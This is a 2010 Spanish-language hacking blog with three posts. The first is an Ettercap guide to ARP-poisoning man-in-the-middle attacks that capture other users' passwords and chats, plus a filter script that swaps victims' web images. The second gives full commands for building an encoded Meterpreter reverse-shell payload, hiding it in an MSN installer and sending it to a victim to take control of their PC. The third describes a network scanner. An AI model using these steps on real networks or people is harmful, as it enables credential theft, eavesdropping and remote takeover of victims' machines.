30 sept. 2010

Manual básico Ettercap (entorno gráfico)

Esta es una guia básica sobre la utilización de ettercap. Este programa que nos permite sniffar el tráfico de red y obtener  así las  contraseñas escritas por otros usuarios de nuestra red, además también permite leer, por ejemplo, las conversaciones del messenger u otros programas de mensajería instantánea.

1 - Primero tenemos que descargar el ettercap, la ultima versión es la 0.7.3 y
esta disponible tanto para windows como para linux:

Windows:
http://sourceforge.net/projects/ettercap/files/unofficial binaries/windows/

Linux:
http://ettercap.sourceforge.net/download.php

o (en el caso de Ubuntu)
# apt-get install ettercap-gtk

2 - Lo instalamos.

Si tienes la versión para compilar de linux:
# ./configure
# make
# make install

A partir de ahora lo interesante:

3 - Arrancamos el ettercap (en caso de linux como root, ya que sino no nos permitira seleccionar la interfaz de red a utilizar).

4 - Pestaña Sniff>Unified Sniffing

5 - Seleccionamos la interfaz que esta conectada a la red que queremos sniffar,
despues le damos a "Aceptar".

6 - Pestaña Host>Scan for hosts.

En la parte de abajo de la pantalla aparecerá algo como " X hosts added to the hosts list..."
(X sera un numero correspondiente al numero de maquinas conectadas a la red).

7 - Pestaña Host>Host list.

Ahora aparecerán las IPs de las maquinas conectadas, hay que tener en cuenta que el router también aparece (No aparece nuestro PC).

8 - Seleccionamos la IP del ordenador a atacar y pulsamos "Add to Target 1", después el router "Add to Target 2".

Ahora ya tenemos los objetivos marcados, pero antes de dar el siguiente paso tenemos que tener en cuenta que vamos a utilizar una técnica llamada Man In The Middle (MITM) y lo que haremos sera que todos los paquetes que van dirigidos al PC atacado pasen por nosotros, con lo que si nosotros nos desconectamos sin detener el ataque MITM nuestra víctima se quedara sin conexión por un tiempo, mientras se reinician las tablas arp.

9 - Pestaña Mitm>ARP Poisoning. Ahora marcamos la pestaña "Sniff remote connections" y pulsamos "Aceptar".

10 - Pestaña Start>Start sniffing.

Con esto estaremos snifando el trafico de red.

11 - Pestaña  View>Connections. Aquí podemos ver todas las conexiones y hacemos doble click sobre alguna podemos ver los datos que contiene, entre ellos conversaciones del messenger, usuarios y contraseñas, etc.

Ahora es cuestión de paciencia.

Bueno un saludo a todos y espero que os sirva.

Respeto a los filtros:

Este filtro se utiliza para cambiar las imagenes de la maquina a la que le hayamos hecho el man in the middle.

Primero tenemos que obtener el script del filtro, para esto vamos a la siguiente pagina y copiamos el script.


El script es el siguiente:
############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                             #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

Ahora modificamos la dirección de las imágenes por las que nosotros queramos, por ejemplo la de portalhacker.net, quedaría así:
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
replace("IMG SRC=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
msg("Filter Ran.\n");
}

Lo siguiente sera guardar el script con extension .filter, por ejemplo imagen.filter.

Una vez hecho esto abrimos una consola y vamos al directorio donde tenemos el imagen.filter. Una vez allí ponemos y se compilara el filtro:
etterfilter imagen.filter -o imagen.ef

Con esto nos generara el imagen.ef. Una vez creado lo copiaremos al directorio de ettercap
/usr/share/ettercap

Ahora arrancamos ettercap y realizamos el MITM. Durante el MITM vamos a la pestaña filters->load a filter.

Una vez aquí seleccionamos el archivo imagen.ef y pulsamos aceptar. Con esto ya estar el filtro aplicado y las imágenes que vea la victima serán sustituidas por las que nosotros queramos.

Autor: Aetsu

28 sept. 2010

[Video] Escondiendo Meterpreter en un instalador de MSN

Bueno... Recorriendo la web me encuentro con este video que es bastante simple y que explica muy bien como transformar un PAYLOAD a exe y como unirlo a un Instalador de MSN con Iexpress. Para luego enviárselo a la víctima y se conecte a nosotros gracias al PAYLOAD [windows/exploits/reverse_tcp] que crea una conexión inversa (osea que nuestra víctima se conecta a nosotros), lo que es muy práctico para evitar el firewall de Windows. Aquí el video, y luego procedo a explicar a los que no les haya quedado muy claro ya que el video está en inglés, pero muy fácil de entender:




Primero se procede a crear el PAYLOAD con extensión *.exe:
root@evilbox:~# cd /pentest/exploits/framework3/
root@evilbox:/pentest/exploits/framework3# ./msfpayload windows/exploits/reverse_tcp LHOST=192.168.1.64 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/payload.exe
En LHOST=192.168.1.64 se tiene que poner nuestra IP ya que la victima se va a conectar a nosotros.

En -o se pone la ruta donde se guardará el payload.exe, puede ser donde sea.

Se deja corriendo en la consola metasploit:
root@evilbox:/pentest/exploits/framework3# ./msfconsole

Luego se procede a unir payload.exe con el instalador de MSN o en su defecto cualquier exe. No voy a entrar en detalles como usar Iexpress ya que en el video es muy claro.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/exploits/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.64
msf exploit(handler) > exploit
Aquí lo único lo que hay cambiar es set LHOST 192.168.1.64 por nuestra IP, como ya expliqué antes. es para que nuestra víctima se conecta a nosotros.

Corremos el exploit con el comando exploit (obvio no XD)

Por último sólo nos queda enviar el "*.exe" (payload.exe + Instalador de MSN) a nuestra víctima y esperar que lo ejecute.

Ahora tenemos el control absoluto desde nuesta consola del PC de tu víctima.

[+] Salu2
[+] ZioneR

27 sept. 2010

SoftPerfect Network Scanner v5.0

SoftPerfect Network Scanner es un escaner gratuito multi-threaded IP, escáner de NetBIOS y SNMP con una interfaz moderna y muchas características avanzadas. Está dirigido a administradores de sistemas y usuarios en general interesados en la seguridad informática. Contiene ping a computadoras, escáneres para escuchar en puertos TCP / UDP y muestra qué tipos de recursos compartidos están en la red (incluidos los ocultos y de sistema).
 
Además, te permite montar carpetas compartidas como unidades de red, navegar por ellos utilizando el Explorador de Windows, filtrar la lista de resultados y mucho más. SoftPerfect Network Scanner también puede comprobar un puerto definido por el usuario e informar si se está abierto. También puede resolver nombres de host y la detección automática de un rango de IP local y externa. Soporta el apagado remoto y Wake-on-LAN.

Principales características:

  • Pings a Computadoras y muestra los activos.
  • Detecta el hardware de direcciones MAC, incluso a través de routers.
  • Detecta las carpetas compartidas y los permisos de escritura.
  • Detecta las direcciones IP internas y externas.
  • Analiza en busca de puertos tcp en escucha, algunos de los servicios UDP y SNMP.
  • Recupera usuarios registrados, configuraciones de cuentas de usuario, el tiempo de actividad, etc
  • Usted puede montar y explorar los recursos de red.
  • Puede lanzar aplicaciones externas de terceros.
  • Se pueden exportar resultados a HTML, XML, CSV y TXT
  • Soporta Wake-On-LAN, apagado remoto y el envío de mensajes de red.
  • Recupera potencialmente cualquier información a través de WMI.
  • Recupera la información de registro remoto, sistema de archivos y gestor de servicios.
  • Es absolutamente gratis, no requiere instalación y no contiene adware/spyware/malware.

Imágenes

Ventana de explorador de la red principal, con algunos resultados del análisis.




El escáner de red puede ser fácilmente configurado a las necesidades del usuario.





Descarga SoftPerfect Network Scanner v5.0
Latest version: 5.0 (Sep 27, 2010)
Plataformas soporta